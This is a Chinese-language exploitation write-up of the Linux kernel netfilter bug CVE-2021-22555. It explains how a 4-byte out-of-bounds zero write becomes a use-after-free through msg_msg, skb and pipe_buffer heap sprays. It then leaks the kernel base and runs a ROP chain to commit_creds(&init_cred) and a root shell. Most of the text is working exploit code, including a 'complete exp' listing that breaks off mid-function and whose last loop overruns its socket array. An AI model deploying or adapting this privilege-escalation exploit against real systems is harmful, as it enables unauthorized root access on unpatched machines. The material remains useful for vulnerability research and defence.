CVE-2021-22555
从4字节堆溢出写0到UAF,再到提权,该 linux kernel 漏洞的利用思路非常值得学习
环境准备
漏洞影响的版本范围比较广的,根据google security-research 描述,已经 patch 的版本有 5.12,5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267
这里偷懒选择已有的环境:
https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-22555
该内核版本为 5.11.14,稍后也以这个版本的源码来解析
漏洞分析
当在 64 位 linux 下,兼容运行 32 位程序,调用 setsockopt(sockfd, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data))
时,内核会先调用 translate_compat_table 将 xt_table_info 32 位下的结构体转存储为 64 位模式的结构体:
/*
 * The table itself: a fixed-size header followed by the rule blob in
 * entries[].
 *
 * NOTE(review): the accompanying write-up's offset arithmetic assumes that
 * entries[] starts 0x40 bytes into this struct on the 64-bit target; confirm
 * against the actual build before relying on that number.
 */
struct xt_table_info {
/* Size per table */
unsigned int size;
/* Number of entries: FIXME. --RR */
unsigned int number;
/* Initial number of entries. Needed for module usage count */
unsigned int initial_entries;
/* Entry points and underflows, one slot per netfilter hook */
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
/*
* Number of user chains. Since tables cannot have loops, at most
* @stacksize jumps (number of user chains) can possibly be made.
*/
unsigned int stacksize;
void ***jumpstack;
/*
 * Start of the variable-length rule data (flexible array member, 8-byte
 * aligned). Per the surrounding write-up this holds the ipt_entry records.
 */
unsigned char entries[] __aligned(8);
};
其中 entries 字段指向的是由 ipt_entry 结构体组成的数组:
/*
 * One rule inside a table's entries[] blob: a fixed header followed by a
 * variable-length tail (elems) that carries the matches and then the target.
 */
struct ipt_entry {
struct ipt_ip ip;
/* Mark with fields that we care about. */
unsigned int nfcache;
/*
 * Size of ipt_entry + matches, i.e. the offset from the start of this
 * entry to its xt_entry_target.
 */
__u16 target_offset;
/*
 * Size of ipt_entry + matches + target, i.e. the offset from the start of
 * this entry to the next one.
 */
__u16 next_offset;
/* Back pointer */
unsigned int comefrom;
/* Packet and byte counters. */
struct xt_counters counters;
/* The matches (if any), then the target. */
unsigned char elems[0];
};
其中的 target_offset 是相对于 ipt_entry 的偏移,指向了一个 xt_entry_target 结构体:
/*
 * Header of a rule's target, followed by target-specific payload in data[].
 *
 * The union gives two views of the same header bytes: the form supplied by
 * userspace (target looked up by name and revision) and the form used inside
 * the kernel (pointer to the resolved xt_target). target_size is the first
 * member of every view, so it can be read through any of them.
 */
struct xt_entry_target {
union {
struct {
__u16 target_size;
/* Used by userspace */
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
struct {
__u16 target_size;
/* Used inside the kernel */
struct xt_target *target;
} kernel;
/* Total length */
__u16 target_size;
} u;
/* Target-specific payload; its length depends on the selected target. */
unsigned char data[0];
};
漏洞出在 translate_compat_table 调用的 xt_compat_target_from_user 中:它调用 memset(t->data + target->targetsize, 0, pad) 将对齐填充的空间清零
/*
 * Convert one target record from the compat (32-bit userspace) layout to the
 * native layout.
 *
 * @t:      on entry, the source record; it is reinterpreted as a
 *          struct compat_xt_entry_target (ct) and then re-pointed at the
 *          destination.
 * @dstptr: in/out cursor into the destination buffer; advanced by the size
 *          of the converted record.
 * @size:   in/out running size; increased by the same delta that is added
 *          to the record size.
 *
 * As quoted here this is the pre-fix version analysed by the surrounding
 * write-up (CVE-2021-22555): the padding memset below can write past the end
 * of the destination buffer.
 */
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
unsigned int *size)
{
const struct xt_target *target = t->u.kernel.target;
struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
/* presumably the native-vs-compat size difference for this target - confirm */
int pad, off = xt_compat_target_offset(target);
u_int16_t tsize = ct->u.user.target_size;
char name[sizeof(t->u.user.name)];
/* From here on t refers to the destination record, ct to the source. */
t = *dstptr;
memcpy(t, ct, sizeof(*ct));
/* Payload: use the target's own converter if it has one, else copy raw. */
if (target->compat_from_user)
target->compat_from_user(t->data, ct->data);
else
memcpy(t->data, ct->data, tsize - sizeof(*ct));
/*
 * Zero the alignment padding after the payload. The write starts at
 * t->data + targetsize and is pad bytes long; nothing here checks it
 * against the destination allocation. Per the write-up, the allocation
 * size is computed without target->targetsize, so this memset is the
 * out-of-bounds zero write.
 */
pad = XT_ALIGN(target->targetsize) - target->targetsize;
if (pad > 0)
memset(t->data + target->targetsize, 0, pad);
tsize += off;
t->u.user.target_size = tsize;
/*
 * The name is staged in a local buffer before module_put() and copied into
 * the record afterwards (presumably so target->name is not read once the
 * module reference has been dropped - confirm).
 */
strlcpy(name, target->name, sizeof(name));
module_put(target->me);
strncpy(t->u.user.name, name, sizeof(t->u.user.name));
*size += off;
*dstptr += tsize;
}
而在 translate_compat_table
调用 xt_alloc_table_info
处,对 size 的计算并没有 target->targetsize
的参与,而仅在 check_compat_entry_size_and_hooks
里,加上了为了对齐 matchsize 和 targetsize 的共 8 字节的大小,因此导致越界写 0 的效果
IPT_SO_SET_REPLACE 需要 CAP_NET_ADMIN 权限,但是这个权限可以在新建 user、network 的命名空间里获得
漏洞利用
xt_table_info
根据源码,可以分析出 xt_table_info 结构体的布局,如下图:
其中 match 和 target 的 data 字段都是大小可变的,转存储后,给 match 和 target 都加上了 4 字节的补齐,然后就是越界 memset 了
控制 targetsize
通过控制 targetsize ,则可以控制越界写 0,但是这个 targetsize 不能直接控制,通过选择不同的 target,对应不同的 targetsize,可以越界最多 0x4c 个字节,target 的选择在以下的调用链中check_compat_entry_size_and_hooks -> xt_request_find_target -> xt_find_target
/*
 * Look up a registered target by address family, name and revision.
 *
 * Returns the matching xt_target with a module reference taken
 * (try_module_get), or an ERR_PTR:
 *   -EINVAL     name has no NUL within XT_EXTENSION_MAXNAMELEN bytes
 *   -EPROTOTYPE the name was found, but only with a different revision
 *   -ENOENT     nothing by that name was found
 *
 * If nothing usable is found for @af, the family-independent list
 * (NFPROTO_UNSPEC) is searched as a fallback.
 */
static struct xt_target *xt_find_target(u8 af, const char *name, u8 revision)
{
struct xt_target *t;
int err = -ENOENT;
/* A name that fills the whole field without a terminator is rejected. */
if (strnlen(name, XT_EXTENSION_MAXNAMELEN) == XT_EXTENSION_MAXNAMELEN)
return ERR_PTR(-EINVAL);
/* The per-family target list is walked under that family's mutex. */
mutex_lock(&xt[af].mutex);
list_for_each_entry(t, &xt[af].target, list) {
if (strcmp(t->name, name) == 0) {
if (t->revision == revision) {
/* If the reference cannot be taken, keep scanning the list. */
if (try_module_get(t->me)) {
mutex_unlock(&xt[af].mutex);
return t;
}
} else
err = -EPROTOTYPE; /* Found something. */
}
}
mutex_unlock(&xt[af].mutex);
if (af != NFPROTO_UNSPEC)
/* Try searching again in the family-independent list */
return xt_find_target(NFPROTO_UNSPEC, name, revision);
return ERR_PTR(err);
}
google security-research 中的 poc 所使用的 target 是 NFQUEUE,它在 nfqueue_tg_init 中注册到 xt 变量里:
/*
 * Registration table for the "NFQUEUE" target: four entries that share the
 * same name and NFPROTO_UNSPEC family and differ by revision (0 to 3).
 * Each revision has its own handler and its own payload struct, so
 * .targetsize differs per revision. The write-up selects revision 1
 * (struct xt_NFQ_info_v1).
 */
static struct xt_target nfqueue_tg_reg[] __read_mostly = {
/* No .revision given, so it is zero-initialized: revision 0, no checkentry. */
{
.name = "NFQUEUE",
.family = NFPROTO_UNSPEC,
.target = nfqueue_tg,
.targetsize = sizeof(struct xt_NFQ_info),
.me = THIS_MODULE,
},
/* Revision 1: payload is struct xt_NFQ_info_v1. */
{
.name = "NFQUEUE",
.revision = 1,
.family = NFPROTO_UNSPEC,
.checkentry = nfqueue_tg_check,
.target = nfqueue_tg_v1,
.targetsize = sizeof(struct xt_NFQ_info_v1),
.me = THIS_MODULE,
},
/* Revision 2: payload is struct xt_NFQ_info_v2. */
{
.name = "NFQUEUE",
.revision = 2,
.family = NFPROTO_UNSPEC,
.checkentry = nfqueue_tg_check,
.target = nfqueue_tg_v2,
.targetsize = sizeof(struct xt_NFQ_info_v2),
.me = THIS_MODULE,
},
/* Revision 3: payload is struct xt_NFQ_info_v3. */
{
.name = "NFQUEUE",
.revision = 3,
.family = NFPROTO_UNSPEC,
.checkentry = nfqueue_tg_check,
.target = nfqueue_tg_v3,
.targetsize = sizeof(struct xt_NFQ_info_v3),
.me = THIS_MODULE,
},
};
可以看到 revision 为 1 时对应的 xt_NFQ_info_v1 结构体只有 4 个字节,也就是 targetsize 为 4,计算得 pad = XT_ALIGN(4) - 4 = 4:
/*
 * Payload of the NFQUEUE target, revision 1. Two 16-bit fields, 4 bytes in
 * total; this sizeof() is the .targetsize of the revision-1 registration.
 */
struct xt_NFQ_info_v1 {
__u16 queuenum;
__u16 queues_total;
};
这样就可以越界写 4 字节的 0。通过调整 t->data 的位置,可以让它只改写某个指针的低两字节;后面的利用就是把这次"指针低两字节清零"转化为 UAF,进而完成权限提升
2 字节溢出写 0
选择 xt_NFQ_info_v1,则可以 memset 4 个字节,可以想到的是,溢出写 0 用来改写某些结构体的指针来进一步利用,比如说 msg_msg.m_list.next 指针,但是改写指针低 4 个字节为 0 很可能不会得到一个有效的指针,所以需要做一下调整,只改指针低两字节则很可能得到一个有效的指针
通过调整 match 的 data 部分的大小,让 xt_table_info 结构体从一个页(也就是 4K 大小)中分配,并且让 memset 刚好只把相邻下一个页开头的两个字节清零,具体如下:
int trigger_oob_write(int s)
{
struct __attribute__((__packed__))
{
struct ipt_replace replace; // 0x5c
struct ipt_entry entry; // 0x70
struct xt_entry_match match; // 0x20
char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
struct xt_entry_target target; // 0x20
} data = {0};
data.replace.num_counters = 1;
data.replace.num_entries = 1;
data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.target_offset =
(sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data));
data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data));
strcpy(data.match.u.user.name, "icmp");
data.match.u.user.revision = 0;
data.target.u.user.target_size = sizeof(data.target); // 0x20
strcpy(data.target.u.user.name, "NFQUEUE");
data.target.u.user.revision = 1;
// Partially overwrite the adjacent buffer with 2 bytes of zero.
if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
{
if (errno == ENOPROTOOPT)
{
printf("[-] error ip_tables module is not loaded.\n");
return -1;
}
}
return 0;
}
此时 memset 如下:
memset(t->data + target->targetsize, 0, 4);
->
memset(newinfo->entries + target_offset + 0x20(offset of data == sizeof(xt_entry_target)) + 4(target->targetsize), 0, 4);
->
memset(newinfo + 0x40 + target_offset + 0x20 + 4, 0, 4);
->
memset(newinfo + 0x40 + 0x70(sizeof ipt_entry) + 0x20(sizeof xt_entry_match) + match_data + 4(align matchsize) + 0x20 + 4, 0, 4)
->
memset(newinfo + PAGE_SIZE - 8 - 2 + 4(align matchsize) + 4(target->targetsize), 0, 4)
->
memset(newinfo + PAGE_SIZE - 2, 0, 4)
UAF
构造主消息与副消息
创建 4096 个消息队列,填充 0x1000 大小的主消息
struct
{
long mtype;
char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
...
int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
*(long *)msgp = msgtyp;
if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0) {
perror("[-] msgsnd");
return -1;
}
return 0;
}
...
puts("[*] Spraying primary messages...");
for (int i = 0; i < NUM_MSQIDS; i++) {
memset(&msg_primary, 0, sizeof(msg_primary));
*(int *)&msg_primary.mtext[0] = MSG_TAG;
*(int *)&msg_primary.mtext[4] = i;
if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) {
goto ret;
}
}
再填充大小为 0x400 的副消息:
struct
{
long mtype;
char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
...
puts("[*] Spraying secondary messages...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
memset(&msg_secondary, 0, sizeof(msg_secondary));
*(int *)&msg_secondary.mtext[0] = MSG_TAG;
*(int *)&msg_secondary.mtext[4] = i;
if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
}
Copy 一张图,如下:
注意:图中的 next 指 msg_msg->m_list.next 而不是 msg_msg->next
其中 *(int *)&mtext[0] = MSG_TAG 用来标记该区域是消息内容区域,*(int *)&mtext[4] = i 用来标记这个消息属于哪个消息队列。当漏洞触发、next 指向改变后,同一队列里主消息和副消息的 *(int *)&mtext[4] 值就会不一致,这样可以找到是哪个 msg_msg 结构体被更改了
制造空洞为 xt_table_info 占位做准备
间隔 1024,释放部分主消息,使得后面 xt_table_info 分配到这些空洞中
int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
...
puts("[*] Creating holes in primary messages...");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
{
if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
goto ret;
}
再 Copy 一张图:
触发漏洞,搜索被破坏的主消息
触发 2 字节溢出写 0 后,更改了某个 msg_msg 的 m_list.next 指针,也就是副消息会指向其他地方,很可能就是另外某个主消息的副消息,利用 msgrcv 的 MSG_COPY 标志读取副消息,而不释放副消息,对比主副消息的 *(int *)&mtext[4]
是否一致,即可找到目标消息队列:
int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
...
puts("[*] Trigger oob write");
if (trigger_oob_write(s) < 0) {
perror("trigger_oob_write");
goto ret;
}
puts("[*] Searching for corrupted primary message...");
int fake_id = -1, real_id = -1;
for (int i = 0; i < NUM_MSQIDS; i++)
{
if (i != 0 && !(i % HOLE_STEP))
continue;
if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
goto ret;
if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
{
printf("[-] MSG_TAG error\n");
goto ret;
}
if (*(int *)&msg_secondary.mtext[4] != i)
{
real_id = *(int *)&msg_secondary.mtext[4];
fake_id = i;
break;
}
}
if (real_id == -1 && fake_id == -1)
{
printf("[-] Could not corrupt any primary message\n");
goto ret;
}
printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);
如图:
释放副消息造成 UAF
利用 real_id 读取释放副消息,fake_id 的副消息指向已经释放的消息,则造成 UAF
puts("[*] Free secondary message and then gain UAF");
if (read_msg(real_id, &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
如图:
有了 UAF 后,这里大致描述下利用思路
- skb 堆喷占位,伪造副消息
- fake_id peek 副消息来 leak 堆地址
- 释放 skb ,利用 leak 出的堆地址来 skb 堆喷伪造合法的副消息
- fake_id read 释放副消息,因为此时副消息的指针都合法可以脱链
- pipe_buffer 堆喷占位
- 读取并释放 skb,读到 pipe_buffer 的内容,泄露 kernel 地址
- skb 堆喷劫持 pipe_buffer->ops
- close pipe,劫持程序执行流提权
skb 堆喷伪造副消息
首先得先泄露堆地址,用于后面伪造合法的副消息
leak heap
利用 skb 堆喷伪造副消息,伪造 m_ts,利用 fake_id 队列 peek 副消息,即可越界读到相邻的副消息的 msg_msg 结构体,从而泄露 msg_msg->m_list.next 和 msg_msg->m_list.prev 这两个堆地址
struct msg_msg
{
uint64_t m_list_next;
uint64_t m_list_prev;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};
struct
{
long mtype;
char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
...
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
msg->m_list_next = m_list_next;
msg->m_list_prev = m_list_prev;
msg->m_type = MTYPE_FAKE;
msg->m_ts = m_ts;
msg->next = next;
msg->security = 0;
}
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (write(ss[i][0], buf, size) < 0)
{
perror("[-] write");
return -1;
}
}
}
return 0;
}
...
int ss[NUM_SOCKETS][2];
char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
struct msg_msg *msg;
uint64_t kheap;
...
puts("[*] Free secondary message and then gain UAF");
if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking adjacent secondary message...");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
{
printf("[-] Could not leak adjacent secondary message");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
kheap = msg->m_list_next; // kheap pointer to the primary message
if (kheap & (PRIMARY_SIZE - 1))
kheap = msg->m_list_prev;
printf("[+] kheap = %#" PRIx64 "\n", kheap);
此时的 kheap 就是相邻副消息的 m_list.next 或者 m_list.prev,指向的就是它对应的主消息
leak address of msg_fake
释放 skb,然后伪造 msg_msg->next = kheap - MSG_MSGSEG_SIZE,也就是让这个主消息成为这个副消息的 msg_msgseg 结构,这样读取副消息的时候,就能把这个主消息也读出来,就能读到它的 m_list.next,也就是 msg_fake 相邻副消息的地址,减去 SECONDARY_SIZE 就是 msg_fake 的地址:
puts("[*] Freeing skb...");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking address of msg_fake");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
{
printf("[-] Could not leak address of msg_fake\n");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE-MSG_MSG_SIZE];
msg_fake_addr = msg->m_list_next;
if (msg_fake_addr & (SECONDARY_SIZE - 1))
msg_fake_addr = msg->m_list_prev;
msg_fake_addr -= SECONDARY_SIZE;
printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);
伪造合法副消息并释放,构造 skb 可控的 UAF
有了 msg_fake 的地址,只要让 msg_fake 的 m_list.next 和 m_list.prev 都等于 msg_fake_addr,随后释放副消息即可成功脱链,留下一块 skb 指向的 free 掉的内存:
puts("[*] Free secondary message and then gain UAF controlled by skb");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
goto ret;
大概就像这样
skb & pipe_buffer 的 UAF 利用思路
leak kernel base
堆喷 pipe_buffer,利用 skb read 泄露 ops 指针,计算出 kernel 基址:
puts("[*] Spraying pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (pipe(pipefd[i]) < 0)
{
perror("[-] pipe");
goto ret;
}
if (write(pipefd[i][1], "xi4oyu", 6) < 0)
{
perror("[-] write");
goto ret;
}
}
puts("[*] Leaking and freeing pipe_buffer object...");
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
{
perror("[-] read");
goto ret;
}
if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE) {
pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
break;
}
}
}
kernel_offset = pipe_buffer_ops - 0xffffffff8223e140; // anon_pipe_buf_ops
kernel_base = kernel_offset + 0xffffffff81000000;
printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);
hijack control flow
skb 堆喷伪造 pipe_buffer,劫持 ops 指针,劫持程序控制流,当关闭管道时,最后进入下面的函数释放 pipe_buffer,可知 rsi 指向 pipe_buffer,可以栈迁移到 pipe_buffer,随后 ROP
/*
 * Release one pipe buffer: read its ops table, clear buf->ops, then call
 * the table's release() hook with (pipe, buf).
 *
 * The ops pointer is loaded from the buffer itself, and buf is passed as the
 * second argument to the indirect call. These are the two facts the
 * surrounding write-up relies on.
 */
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;
/* Cleared before the callback runs; the saved copy is what gets called. */
buf->ops = NULL;
ops->release(pipe, buf);
}
ROP 执行 commit_creds(&init_cred) 提权,平衡栈最后回到用户态起 shell 即可,具体操作如下:
puts("[*] Spraying fake pipe_buffer...");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)secondary_buf;
buf->ops = msg_fake_addr + 0x200;
ops = (struct pipe_buf_operations *)&secondary_buf[0x200];
ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]
*(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9; // add rsp, 0xd0 ; ret
*(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0; // pop rsp ; ret
rop = (uint64_t *)&secondary_buf[0xd0 + 8];
ridx = 0;
rop[ridx++] = kernel_offset + 0xffffffff8108c650; // pop rdi ; ret
rop[ridx++] = kernel_offset + 0xffffffff8286b780; // init_cred
rop[ridx++] = kernel_offset + 0xffffffff810c9f00; // commit_creds
rop[ridx++] = kernel_offset + 0xffffffff8108c5bc; // mov rsp, rbp ; pop rbp ; ret
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Releasing pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (close(pipefd[i][0]) < 0)
{
perror("[-] close");
goto ret;
}
if (close(pipefd[i][1]) < 0)
{
perror("[-] close");
goto ret;
}
}
system("/bin/sh");
exp
完整 exp 如下:
// gcc -m32 -static -o exp exp.c
#define _GNU_SOURCE
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <err.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netfilter/x_tables.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <sched.h>
#include <inttypes.h>
#define PAGE_SIZE 0x1000
#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400
#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 128
#define NUM_MSQIDS 4096
#define HOLE_STEP 1024
#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337
#define MSG_TAG 0xAAAAAAAA
#define SKB_SHARED_INFO_SIZE 0x140
#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))
struct msg_msg
{
uint64_t m_list_next;
uint64_t m_list_prev;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};
struct msg_msgseg
{
uint64_t next;
};
struct pipe_buffer
{
uint64_t page;
uint32_t offset;
uint32_t len;
uint64_t ops;
uint32_t flags;
uint32_t pad;
uint64_t private;
};
struct pipe_buf_operations
{
uint64_t confirm;
uint64_t release;
uint64_t steal;
uint64_t get;
};
struct
{
long mtype;
char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
struct
{
long mtype;
char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
struct
{
long mtype;
char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
void getRootShell(void)
{
puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");
if (getuid())
{
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
exit(-1);
}
puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell "
"now...\033[0m");
system("/bin/sh");
exit(0); // to exit the process normally instead of segmentation fault
}
int trigger_oob_write(int s)
{
struct __attribute__((__packed__))
{
struct ipt_replace replace; // 0x5c
struct ipt_entry entry; // 0x70
struct xt_entry_match match; // 0x20
char match_data[PAGE_SIZE - 0x40 - sizeof(struct ipt_entry) - sizeof(struct xt_entry_match) - sizeof(struct xt_entry_target) - 8 - 2];
struct xt_entry_target target; // 0x20
} data = {0};
data.replace.num_counters = 1;
data.replace.num_entries = 1;
data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
sizeof(data.match_data) + sizeof(data.target));
data.entry.target_offset =
(sizeof(data.entry) + sizeof(data.match) + sizeof(data.match_data));
data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.match_data));
strcpy(data.match.u.user.name, "icmp");
data.match.u.user.revision = 0;
data.target.u.user.target_size = sizeof(data.target); // 0x20
strcpy(data.target.u.user.name, "NFQUEUE");
data.target.u.user.revision = 1;
// Partially overwrite the adjacent buffer with 2 bytes of zero.
if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0)
{
if (errno == ENOPROTOOPT)
{
printf("[-] error ip_tables module is not loaded.\n");
return -1;
}
}
return 0;
}
int setup_sandbox(void)
{
if (unshare(CLONE_NEWUSER) < 0)
{
perror("[-] unshare(CLONE_NEWUSER)");
return -1;
}
if (unshare(CLONE_NEWNET) < 0)
{
perror("[-] unshare(CLONE_NEWNET)");
return -1;
}
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
if (sched_setaffinity(getpid(), sizeof(set), &set) < 0)
{
perror("[-] sched_setaffinity");
return -1;
}
return 0;
}
int write_msg(int id, const void *msgp, size_t msgsz, long msgtyp)
{
*(long *)msgp = msgtyp;
if (msgsnd(id, msgp, msgsz - sizeof(long), 0) < 0)
{
perror("[-] msgsnd");
return -1;
}
return 0;
}
int read_msg(int id, void *msgp, size_t msgsz, long msgtyp)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), msgtyp, 0) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
int peek_msg(int id, void *msgp, size_t msgsz, long index)
{
if (msgrcv(id, msgp, msgsz - sizeof(long), index, MSG_COPY | IPC_NOWAIT) < 0)
{
perror("[-] msgrcv");
return -1;
}
return 0;
}
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next)
{
msg->m_list_next = m_list_next;
msg->m_list_prev = m_list_prev;
msg->m_type = MTYPE_FAKE;
msg->m_ts = m_ts;
msg->next = next;
msg->security = 0;
}
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size)
{
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (write(ss[i][0], buf, size) < 0)
{
perror("[-] write");
return -1;
}
}
}
return 0;
}
int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size)
{
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (read(ss[i][1], buf, size) < 0)
{
perror("[-] read");
return -1;
}
}
}
return 0;
}
int main(int argc, char const *argv[])
{
int s;
int msqid[NUM_MSQIDS];
int ss[NUM_SOCKETS][2];
int pipefd[NUM_PIPEFDS][2];
int fake_id = -1, real_id = -1;
char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
struct msg_msg *msg;
uint64_t kheap = 0, msg_fake_addr = 0;
uint64_t pipe_buffer_ops = 0, kernel_base = 0, kernel_offset = 0;
struct pipe_buf_operations *ops;
struct pipe_buffer *buf;
int ridx = 0;
uint64_t *rop;
if (setup_sandbox() < 0)
return -1;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
return -1;
}
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0)
